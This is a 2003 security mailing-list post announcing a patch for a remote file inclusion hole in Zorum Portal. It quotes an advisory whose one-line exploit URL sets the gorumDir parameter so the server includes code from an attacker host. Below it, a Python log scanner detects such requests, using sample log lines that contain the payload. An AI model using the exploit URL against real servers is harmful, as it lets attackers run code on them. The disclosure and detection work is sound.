From: Frog Man (leseulfrog_at_hotmail.com)
Date: Sun Jan 26 2003 - 13:03:49 CST
A patch has been created for this hole and can be found on
http://www.phpsecure.org/.
>From: MGhz <magas_at_mail.lt>
>To: bugtraq_at_securityfocus.com
>Subject: Zorum Portal (PHP)
>Date: 22 Jan 2003 19:45:26 -0000
>
>
>
>Version : 3.0;3.1;3.2
>Website : http://zorum.phpoutsourcing.com/
>Problem : Include file
>
>
>File:
>---------------------------------
>include.php
>---------------------------------
>
>PHP Code:
>---------------------------------
>[...]
>include("$gorumDir/generformlib_multipleselection.php");
>include("$gorumDir/generformlib_groupselection.php");
>include("$gorumDir/generformlib_filebutton.php");
>include("$gorumDir/group.php");
>[...]
>---------------------------------
>
>Exploit :
>---------------------------------
>http://[target]/[forum_dir]/include.php?gorumDir=http://[attacker]/
>-->
>include http://[attacker]/group.php on remote server
>---------------------------------
>
>--
>magas_at_mail.lt
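
To check web server logs for requests of the form shown in the quoted advisory, the following added example (not part of either message, and not the phpsecure.org patch) scans access-log lines for a `gorumDir` query parameter whose value is a URL. The Common Log Format layout, the sample lines and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Include-path parameter named in the advisory. PHP variable names are
# case-sensitive, so the match is exact. Add other parameters as needed.
INCLUDE_PARAMS = {"gorumDir"}

# A value that begins with "scheme://" points the include at a stream
# wrapper (http, https, ftp, ...) instead of a local directory.
REMOTE_VALUE = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.IGNORECASE)

# Request field of a Common/Combined Log Format line: "METHOD target HTTP/x.y"
# Parameters sent in a POST body are not logged and are out of scope here.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def remote_include_hits(log_lines):
    """Return (line_number, parameter, decoded_value) for each suspicious request."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue  # not a parsable request line
        query = urlsplit(match.group(1)).query
        # parse_qsl percent-decodes once, as PHP does for $_GET values.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name in INCLUDE_PARAMS and REMOTE_VALUE.match(value):
                hits.append((number, name, value))
    return hits


# Constructed sample log lines (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Jan/2003:13:00:01 -0600] "GET /forum/index.php?m=3 HTTP/1.0" 200 5120',
    '192.0.2.77 - - [26/Jan/2003:13:00:09 -0600] "GET /forum/include.php?gorumDir=http://198.51.100.5/ HTTP/1.0" 200 88',
    '192.0.2.77 - - [26/Jan/2003:13:00:12 -0600] "GET /forum/include.php?gorumDir=HtTp%3A%2F%2F198.51.100.5%2F HTTP/1.0" 200 88',
    '192.0.2.31 - - [26/Jan/2003:13:01:40 -0600] "GET /forum/include.php?gorumDir=gorum HTTP/1.0" 200 4410',
]

if __name__ == "__main__":
    for hit in remote_include_hits(SAMPLE_LOG):
        print(hit)
```

Any request that sets `gorumDir` at all deserves a look on an unpatched install; the URL check only separates the remote-include form from other values.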